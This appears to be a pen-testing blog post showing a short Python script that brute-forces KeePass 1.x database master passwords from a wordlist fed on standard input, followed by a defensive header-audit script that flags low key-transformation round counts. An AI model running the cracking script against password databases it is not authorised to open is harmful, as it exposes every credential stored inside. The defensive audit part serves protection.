Brute-forcing KeePass password key-chains
From the website:
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
This open source password manager is available on Windows, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.
Looking for ways to brute-force the password, I stumbled across this Python implementation, which is able to read the file and dump its contents. It should not be very inefficient, since it uses pycrypto, which is implemented in C.
The code is fairly simple and expects the list of passwords on standard input. One possibility is to use John the Ripper for this task :)
You can find the code below.
#!/usr/bin/env python
# https://github.com/brettviren/python-keepass
# Reads a list of passwords from standard input.
# John the Ripper may be used to feed the application.
import sys

from keepass import kpdb

for line in sys.stdin:
    passwd = line.strip("\n")
    try:
        # A wrong password surfaces as ValueError and the candidate is skipped.
        db = kpdb.Database(sys.argv[1], passwd)
        print("Valid password found for %s : %s" % (sys.argv[1], passwd))
        sys.exit(0)
    except ValueError:
        pass
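For the defensive side of the same attack, this added example (not part of the original post or of python-keepass) reads the unencrypted 124-byte KeePass 1.x header and reports the key-transformation round count, which sets the cost of every guess a script like the one above makes. The function names, the `MIN_ROUNDS` threshold and the sample header are assumptions constructed for illustration.

```python
import struct
import sys

# KeePass 1.x (.kdb) header: 124 bytes, little-endian, stored unencrypted.
# sig1, sig2, flags, version, seed[16], iv[16], groups, entries,
# contents_hash[32], transform_seed[32], key_transform_rounds
KDB_HEADER = struct.Struct("<4I16s16s2I32s32sI")
KDB_SIGNATURE = (0x9AA2D903, 0xB54BFB65)
CIPHER_FLAGS = {2: "AES", 8: "Twofish"}
MIN_ROUNDS = 100000  # assumed policy threshold, not a KeePass constant


def audit_kdb_header(data, min_rounds=MIN_ROUNDS):
    """Report the per-guess work factor recorded in a KDB header."""
    if len(data) < KDB_HEADER.size:
        raise ValueError("too short to contain a KDB header")
    (sig1, sig2, flags, _version, _seed, _iv, groups, entries,
     _contents_hash, _transform_seed, rounds) = KDB_HEADER.unpack_from(data)
    if (sig1, sig2) != KDB_SIGNATURE:
        raise ValueError("not a KeePass 1.x database")
    ciphers = [name for bit, name in sorted(CIPHER_FLAGS.items()) if flags & bit]
    return {
        "cipher": ciphers[0] if ciphers else "unknown",
        "groups": groups,      # counts are readable without the password
        "entries": entries,
        "rounds": rounds,      # key transformations paid for every guess
        "weak_work_factor": rounds < min_rounds,
    }


def sample_header(rounds, flags=1 | 2):
    """Constructed header for the demo: zeroed seeds/hash, 3 groups, 12 entries."""
    return KDB_HEADER.pack(KDB_SIGNATURE[0], KDB_SIGNATURE[1], flags, 0x00030002,
                           b"\0" * 16, b"\0" * 16, 3, 12,
                           b"\0" * 32, b"\0" * 32, rounds)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            header = fh.read(KDB_HEADER.size)
    else:
        header = sample_header(6000)  # constructed input
    print(audit_kdb_header(header))
```

A database flagged with `weak_work_factor` relies almost entirely on the strength of the master password; raising the round count in the database settings or adding a key file increases the cost of each guess.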